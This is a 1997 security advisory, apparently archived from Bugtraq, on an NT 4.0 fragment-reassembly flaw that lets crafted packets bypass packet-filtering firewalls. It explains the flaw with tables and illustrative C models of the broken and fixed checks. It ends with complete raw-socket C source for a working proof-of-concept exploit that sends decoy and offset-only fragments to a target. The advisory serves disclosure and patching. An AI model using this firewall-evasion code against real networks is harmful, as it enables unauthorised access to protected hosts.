NT fragmentation attack

Summary
Description: A flaw in the NT fragment reassembly algorithm allows you to smuggle packets to NT boxes through packet-filtering firewalls. You "hide" the TCP header in an offset IP fragment and just neglect to send the first (zero-offset) fragment. NT (pre-SP3) will still happily reassemble your packet, placing the fragment with the lowest offset at the front.
Author: Thomas Lopatic
Compromise: Talk to NT boxes behind packet-filtering firewalls
Vulnerable Systems: NT 4.0 w/o SP3 installed, and probably 3.51
Date: 10 July 1997
Notes: I *LOVE* this advisory. Fully detailed ... includes source code so I don't have to spend 5 hours reproducing this. Thanks Thomas!
Details


Date: Thu, 10 Jul 1997 05:45:54 -0500
From: Aleph One <aleph1@DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: A New Fragmentation Attack

http://www.dataprotect.com/ntfrag/

 A New Fragmentation Attack

 by Thomas Lopatic, 970709

 This page is brought to you by Data Protect.

 The attack presented in this article is no longer quite current, since
 it applies only to Windows NT 4.0 systems without Service Pack 3
 installed. However, it presents an interesting scenario which once
 more demonstrates that packet filtering firewalls may be insecure in
 very subtle ways.

 1 Impact

 The attack affects Windows NT 4.0 hosts (up to and including Service
 Pack 2) that are protected by a firewall which is based on packet
 screening. Stateful inspection firewalls may also be affected,
 depending on their implementation.

 Using this weakness, an outsider is able to pass IP datagrams through
 the firewall to the Windows NT host, i.e. access the host as if the
 firewall did not exist.

 This problem has been fixed with Service Pack 3. Upgrade NOW!

 2 Description

 When reassembling a fragmented IP packet, the Microsoft implementation
 does not require the first fragment to have an offset value of zero.
 It merely checks whether the sum of the lengths of the collected
 fragments equals the total length of the original unfragmented IP
 packet. If enough fragments have been received so that this condition
 holds, the NT stack will happily reassemble what it has got so far.

 So - how does it know about the total length of the original packet?
 Since, during normal operation, all fragments but the last have the MF
 (more fragments) bit set, Microsoft's stack waits until it has
 received a fragment F without the MF bit and then reasons that the
 length of the unfragmented datagram must have been offset of F +
 length of F. Apparently Microsoft have tried to be particularly
 efficient since this method is faster than traversing the whole list
 of fragments to check for completeness.

 Let me illustrate this mechanism with an example. Say that we have an
 original packet of 48 bytes which we send as three fragments F1, F2
 and F3, each with a length of 16 bytes. Now suppose that they arrive
 out of order, first F2, then F3 and eventually F1. The following table
 shows NT's notion of the total packet length after each fragment has
 arrived.
  Fragment  Offset  Length  MF bit  Total Length                      Data Collected

  F2        16      16      1       0  (no change, since MF = 1)      16
  F3        32      16      0       48 (= offset + length = 32 + 16)  32
  F1        0       16      1       48 (no change, since MF = 1)      48

 Once Total Length equals Data Collected, the IP stack decides that it
 has received all fragments and starts reassembling. To exploit this
 goodie courtesy of Microsoft, we clear the MF bit on a fragment other
 than the last one. Suppose we send two new fragments, F1 and F2, as
 follows.
  Fragment  Offset  Length  MF bit  Total Length                      Data Collected

  F1        16      16      0       32 (= offset + length = 16 + 16)  16
  F2        32      16      1       32 (no change, since MF = 1)      32

 We have just sent two fragments, neither of which has an offset of
 zero, yet the NT protocol stack will correctly reassemble them into a
 32 byte IP packet.
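
 The bookkeeping in the two tables above can be replayed with a small C
 model. This is only a sketch of the behaviour described in this
 article, not Microsoft's code. The names struct frag, struct reasm,
 flawed_add and flawed_run are made up for illustration.

```c
/* Hypothetical model of one IP fragment; field names are illustrative. */
struct frag {
    unsigned offset;  /* byte offset within the original datagram */
    unsigned length;  /* payload bytes carried by this fragment */
    int mf;           /* 1 if the "more fragments" bit is set */
};

/* Reassembly state as described in the article: just two counters. */
struct reasm {
    unsigned total_len;  /* stays 0 until a fragment with MF = 0 arrives */
    unsigned collected;  /* sum of the lengths of all fragments seen */
};

/* Account for one fragment. Returns 1 as soon as the flawed check
   (collected == total_len) would trigger reassembly, else 0.
   Note that the offset is never compared against zero. */
int flawed_add(struct reasm *r, const struct frag *f)
{
    if (!f->mf)
        r->total_len = f->offset + f->length;
    r->collected += f->length;
    return r->total_len != 0 && r->collected == r->total_len;
}

/* Feed n fragments in arrival order. Returns the 1-based index of the
   fragment that triggered reassembly, or 0 if it never triggered. */
unsigned flawed_run(const struct frag *frags, unsigned n)
{
    struct reasm r = {0, 0};
    unsigned i;

    for (i = 0; i < n; i++)
        if (flawed_add(&r, &frags[i]))
            return i + 1;
    return 0;
}
```

 Fed the three fragments of the first table in arrival order (F2, F3,
 F1), flawed_run reports completeness after the third fragment. Fed the
 two crafted fragments of the second table, it reports completeness
 after the second one, although no fragment with an offset of zero was
 ever seen.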

 3 Exploit Details

 Exploiting this feature is a bit more complicated than it seems at
 first sight. Since the IP stack stores the IP header of a fragment (to
 use it later for the reassembled packet) if and only if its offset is
 zero, we must send a decoy packet first, which must be carefully
 crafted so that it will be stored at exactly the same memory location
 as our next packet, which is the malicious one without the
 zero-offset-fragment. So, the bogus datagram will reuse the header
 information of our first datagram.

 Imagine that we would like to attack a WWW server behind a firewall.
 Then we would send one decoy to port 80, a malicious packet to 23,
 another decoy to port 80, another bogus packet to port 23, etc. In
 this way we can establish a telnet session through the packet screen.

 But what do we do when we hit a packet screen (e.g. screend) which
 requires for each fragmented packet a fragment with an offset of zero
 to be present? We send such a fragment and simply give it a time to
 live that is short enough so that it will reach the firewall but never
 the destination host. Another option would be to insert an invalid
 checksum into its IP header so that it will be dropped at the
 destination host.

 4 Example Code

 In order to back up the above theory with an example, I have written a
 short program which sends a decoy UDP datagram to port 9 (discard) of
 my NT system and after that another UDP datagram to port 7 (echo). I
 have used port 255 as the source port. The program runs on NetBSD 1.2
 and should be easily portable to any BSD system featuring the Berkeley
 Packet Filter. Here is the output of tcpdump after an example run.

 bob:/usr/home/tl# tcpdump
 tcpdump: listening on ed0
 01:54:38.751853 bob.255 > alice.discard: udp 248 (frag 256:256@0+)
 01:54:38.752252 bob > alice: (frag 256:256@256)
 01:54:38.752645 bob > alice: (frag 512:256@256)
 01:54:38.753054 bob > alice: (frag 512:256@512+)
 01:54:38.755716 alice.echo > bob.255: udp 248
 01:54:38.755992 bob > alice: icmp: bob udp port 255 unreachable
 ^C
 6 packets received by filter
 0 packets dropped by kernel
 bob:/usr/home/tl#

 As can easily be seen, alice, my NT system, responds (line seven in
 the above listing) to the two fragments sent by bob (lines five and
 six). The first two fragments (lines three and four) make up the decoy
 packet. Finally, alice gets an ICMP message, since bob does not have
 any service listening at port 255. The source code for this little
 demo program follows this article.
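
 To read the listing, it helps to know that tcpdump prints fragments as
 id:length@offset, with a trailing + when the MF bit is set, and that
 the IP header stores the offset in units of 8 bytes in the low 13 bits
 of the 16-bit flags/offset field. The following sketch decodes that
 field. The helper names and the FRAG_* macros are my own; the mask
 values correspond to IP_MF and IP_OFFMASK in <netinet/ip.h>.

```c
#include <stdio.h>

#define FRAG_MF      0x2000u  /* "more fragments" flag */
#define FRAG_OFFMASK 0x1fffu  /* low 13 bits: offset in 8-byte units */

/* Byte offset encoded in a host-order flags/offset field. */
unsigned frag_byte_offset(unsigned ip_off)
{
    return (ip_off & FRAG_OFFMASK) * 8u;
}

/* 1 if the MF bit is set, else 0. */
int frag_more(unsigned ip_off)
{
    return (ip_off & FRAG_MF) != 0;
}

/* Write "id:len@offset" (plus "+" if MF is set) into buf, in the style
   of tcpdump's fragment notation. Returns snprintf's result. */
int frag_format(char *buf, size_t n, unsigned id, unsigned len,
                unsigned ip_off)
{
    return snprintf(buf, n, "%u:%u@%u%s", id, len,
                    frag_byte_offset(ip_off),
                    frag_more(ip_off) ? "+" : "");
}
```

 With the three field values used by the demo program, 0x2000 decodes
 to offset 0 with MF set, 32 to offset 256 with MF clear, and 0x2040 to
 offset 512 with MF set, which matches the four fragments in the
 listing.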

 5 Conclusions

 Once again it has been shown that packet filtering firewalls can be a
 dangerous thing to deploy. In a way, they always have to rely on the
 protected hosts to handle IP packets in the expected manner. And
 sometimes these hosts fail to do so.

 Hopefully this example will show people that a solid application
 gateway may be a better choice than all those fast and flexible packet
 screens.

 6 Service Pack 3

 This Service Pack fixes the problem mentioned above. It introduces a
 check that the IP stack has seen a fragment with an offset of zero
 before reassembly is done.
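
 A minimal C model of such a check is sketched below. It assumes that
 the reassembly logic otherwise only compares the sum of the fragment
 lengths against the total length, as section 2 describes. It is not
 taken from Service Pack 3, and the names struct frag, struct reasm,
 checked_add and checked_run are hypothetical.

```c
/* Hypothetical model of one IP fragment; field names are illustrative. */
struct frag {
    unsigned offset;  /* byte offset within the original datagram */
    unsigned length;  /* payload bytes carried by this fragment */
    int mf;           /* 1 if the "more fragments" bit is set */
};

struct reasm {
    unsigned total_len;  /* stays 0 until a fragment with MF = 0 arrives */
    unsigned collected;  /* sum of the lengths of all fragments seen */
    int seen_first;      /* 1 once a fragment with offset 0 has arrived */
};

/* Account for one fragment. Reassembly is only allowed once the length
   check holds AND a zero-offset fragment has been seen. */
int checked_add(struct reasm *r, const struct frag *f)
{
    if (f->offset == 0)
        r->seen_first = 1;
    if (!f->mf)
        r->total_len = f->offset + f->length;
    r->collected += f->length;
    return r->seen_first && r->total_len != 0 &&
           r->collected == r->total_len;
}

/* Feed n fragments in arrival order. Returns the 1-based index of the
   fragment that triggered reassembly, or 0 if it never triggered. */
unsigned checked_run(const struct frag *frags, unsigned n)
{
    struct reasm r = {0, 0, 0};
    unsigned i;

    for (i = 0; i < n; i++)
        if (checked_add(&r, &frags[i]))
            return i + 1;
    return 0;
}
```

 With this extra condition, the two crafted fragments from section 2
 (offsets 16 and 32) never trigger reassembly, while the ordinary
 three-fragment example still completes. Note that a sum of lengths
 alone does not prove that the fragments cover the datagram without
 gaps or overlaps, so a thorough implementation would verify that too.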

 However, I will not stop investigating. Maybe Microsoft has hidden
 some more goodies for us to discover. :)
/*
   This program demonstrates a new kind of fragmentation attack
   involving Windows NT 4.0 hosts behind packet filtering
   firewalls. See http://www.dataprotect.com/ntfrag/ for details
   on this attack.

   It should compile cleanly on any BSD system which has the
   Berkeley Packet Filter installed and has been tested on
   NetBSD 1.2 against a Windows NT 4.0 (SP2) host.

   OpenBSD patches provided by Theo de Raadt <deraadt@cvs.openbsd.org>.

   SERVICE PACK 3 FIXES THIS PROBLEM! INSTALL IT - NOW!

   Thomas Lopatic (thomas@dataprotect.com), 970709
*/

#include <sys/types.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/udp.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/errno.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <net/bpf.h>
#include <net/if.h>
#include <stdlib.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>

char bpf_dev[] = "/dev/bpf1";   /* the BPF device to use */
char inter[] = "ed0";           /* the ethernet device we'll attach to */
char src[] = "172.16.0.2";      /* our address */
char dest[] = "172.16.0.1";     /* the target system's address */
int sport = 255;                /* the source port for the UDP datagram */
int dport = 9;                  /* the decoy destination port */
int real_dport = 7;             /* the real destination port */

u_short calc_sum(u_short start, u_short *buff, int len)
{
  u_long sum = start;

  while (len--)
    sum += *buff++;

  sum = (sum >> 16) + (sum & 0xffff);
  sum = (sum >> 16) + (sum & 0xffff);

  return sum;
}

void dump_hex(u_char *buffer, int size)
{
  int i, off = 0;

  while (off < size) {
    printf("%.4x:", off);
    for (i = 0; i < 16 && i + off < size; i++)
      printf(" %.2x", buffer[i + off]);
    printf("\n");
    off += i;
  }
}

int main(int ac, char *av[])
{
  int i, s, k, bpf, res = 0, true = 1;
  unsigned char dgram[276];
  union {
    unsigned long l[3];
    unsigned short s[6];
    unsigned char c[12];
  } pseudo;
  struct ip *iph;
  struct udphdr *udph;
  struct sockaddr_in daddr;
  struct timeval to = {0, 500000};
  int blen;
  u_char *bbuff;
  struct ifreq req;
  struct bpf_hdr *bhdr;

  if (getuid()) {
    printf("you must be root to use this program\n");
    return 12;
  }

  if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
    perror("socket");
    res = 1;
  } else {
    if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &true, sizeof(true)) < 0) {
      perror("setsockopt");
      res = 2;
    } else if ((bpf = open(bpf_dev, O_RDWR)) < 0) {
      perror("open");
      res = 3;
    } else {
      if (ioctl(bpf, BIOCGBLEN, &blen) < 0) {
	perror("ioctl(BIOCGBLEN)");
	res = 4;
      } else if ((bbuff = malloc(blen)) == NULL) {
	perror("malloc");
	res = 5;
      } else {
	strcpy(req.ifr_name, inter);
	if (ioctl(bpf, BIOCSETIF, &req) < 0) {
	  perror("ioctl(BIOCSETIF)");
	  res = 6;
	} else if (ioctl(bpf, BIOCSRTIMEOUT, &to) < 0) {
	  perror("ioctl(BIOCSRTIMEOUT)");
	  res = 7;
	} else {
	  daddr.sin_len = sizeof(daddr);
	  daddr.sin_family = AF_INET;
	  daddr.sin_port = dport;
	  daddr.sin_addr.s_addr = inet_addr(dest);
       
	  for (i = 0; i < sizeof(dgram); dgram[i++] = 0);
	  for (i = 0; i < 3; pseudo.l[i++] = 0);

	  iph = (struct ip *)&dgram[0];
	  udph = (struct udphdr *)&dgram[20];

	  iph->ip_v = IPVERSION;
	  iph->ip_hl = 5;
#ifdef __OpenBSD__
	  iph->ip_len = htons(276);
#else
	  iph->ip_len = 276;
#endif
	  iph->ip_id = 1;
	  iph->ip_ttl = 255;
	  iph->ip_p = pseudo.c[9] = IPPROTO_UDP;
	  iph->ip_src.s_addr = pseudo.l[0] = inet_addr(src);
	  iph->ip_dst.s_addr = pseudo.l[1] = inet_addr(dest);

	  /*
	    offset = 0, length = 256, MF = 1
	    -> total length is not affected by this fragment
	  */

#ifdef __OpenBSD__
	  iph->ip_off = htons(0x2000);
#else
	  iph->ip_off = 0x2000;
#endif
	  iph->ip_sum = ~calc_sum(0, (u_short *)iph, 10);

	  /* host-to-network conversion (same byte swap as ntohs) */
	  udph->uh_sport = htons(sport);
	  udph->uh_dport = htons(dport);
	  udph->uh_ulen = pseudo.s[5] = htons(256);
	  udph->uh_sum = ~calc_sum(calc_sum(0, pseudo.s, 6), (u_short *)udph,
				   128);

	  /* send the first half of the decoy */

	  if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
		     sizeof(daddr)) < 0) {
	    perror("sendto");
	    res = 8;
	  }

	  /*
	    offset = 256, length = 256, MF = 0
	     -> total length is set to 512 by this fragment
	  */

#ifdef __OpenBSD__
	  iph->ip_off = htons(32);
#else
	  iph->ip_off = 32;
#endif
	  iph->ip_sum = 0;
	  iph->ip_sum = ~calc_sum(0, (u_short *)iph, 10);
	  for (i = 20; i < 276; dgram[i++] = 0);

	  /* send the second half of the decoy */

	  if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
		     sizeof(daddr)) < 0) {
	    perror("sendto");
	    res = 9;
	  }

	  iph->ip_id++;
	  iph->ip_sum = 0;
	  iph->ip_sum = ~calc_sum(0, (u_short *)iph, 10);

	  /* host-to-network conversion (same byte swap as ntohs) */
	  udph->uh_sport = htons(sport);
	  udph->uh_dport = htons(real_dport);
	  udph->uh_ulen = pseudo.s[5] = htons(256);
	  udph->uh_sum = ~calc_sum(calc_sum(0, pseudo.s, 6), (u_short *)udph,
				   128);

	  /*
	     send the first half of the real datagram
	     we have kept the offset settings from above
	     offset = 256, length = 256, MF = 0
	     -> total length is set to 512 by this fragment
	  */

	  if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
		     sizeof(daddr)) < 0) {
	    perror("sendto");
	    res = 10;
	  }

	  /*
	     offset = 512, length = 256, MF = 1
	     -> total length is not affected
	  */

#ifdef __OpenBSD__
	  iph->ip_off = htons(0x2040);
#else
	  iph->ip_off = 0x2040;
#endif
	  iph->ip_sum = 0;
	  iph->ip_sum = ~calc_sum(0, (u_short *)iph, 10);
	  for (i = 20; i < 276; dgram[i++] = 0);

	  /* send the second half of the real datagram */

	  if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
		     sizeof(daddr)) < 0) {
	    perror("sendto");
	    res = 11;
	  }
	}
	free(bbuff);
      }
      close(bpf);
    }
    close(s);
  }
  return res;
}

This page is part of Fyodor's exploit world.